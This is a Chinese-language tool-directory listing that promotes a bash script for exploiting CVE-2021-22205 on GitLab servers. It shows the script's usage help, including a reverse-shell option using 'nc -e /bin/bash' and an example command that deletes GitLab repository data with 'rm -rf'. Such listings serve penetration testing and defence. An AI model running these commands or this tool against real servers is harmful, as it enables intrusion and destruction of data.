Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
gitlab-cve-2021-22205 — 一个利用CVE-2021-22205攻击易受攻击的GitLab实例的简单bash脚本 | Kitploit
工具/GitHubGitHub/nukingdragons/gitlab-cve-2021-22205
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试命令与控制红队
GitHubnukingdragons/gitlab-cve-2021-22205

gitlab-cve-2021-22205

一个利用CVE-2021-22205攻击易受攻击的GitLab实例的简单bash脚本

查看仓库
122年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

gitlab-cve-2021-22205

一个简单的bash脚本,用于利用CVE-2021-22205攻击存在漏洞的gitlab实例

用法

root@kitploit:~
Usage: cve-2021-22205.sh [options]
Options:
	-h,--help		Show this help
	-t,--target		Set the target server (i.e. "http://gitlab.example.com")
	-i,--reverse-ip		Set the IP to connect back to
	-p,--reverse-port	Set the port to connect back to
	-c,--command		Set the raw command to run instead of the built-in reverse shell (i.e. "nc -e /bin/bash 127.0.0.1 1337")
Examples:
	Use the built-in reverse shell payload:
		cve-2021-22205.sh -t http://gitlab.example.com -i 127.0.0.1 -p 1337
	Run a custom command:
		cve-2021-22205.sh -t http://gitlab.example.com -c "rm -rf /var/opt/gitlab/git-data/*"

选项: -h,--help 显示此帮助 -t,--target 设置目标服务器(例如 "http://gitlab.example.com") -i,--reverse-ip 设置回连的IP -p,--reverse-port 设置回连的端口 -c,--command 设置要运行的原始命令,取代内置的反向shell(例如 "nc -e /bin/bash 127.0.0.1 1337") 示例: 使用内置反向shell载荷: cve-2021-22205.sh -t http://gitlab.example.com -i 127.0.0.1 -p 1337 运行自定义命令: cve-2021-22205.sh -t http://gitlab.example.com -c "rm -rf /var/opt/gitlab/git-data/*"

下载工具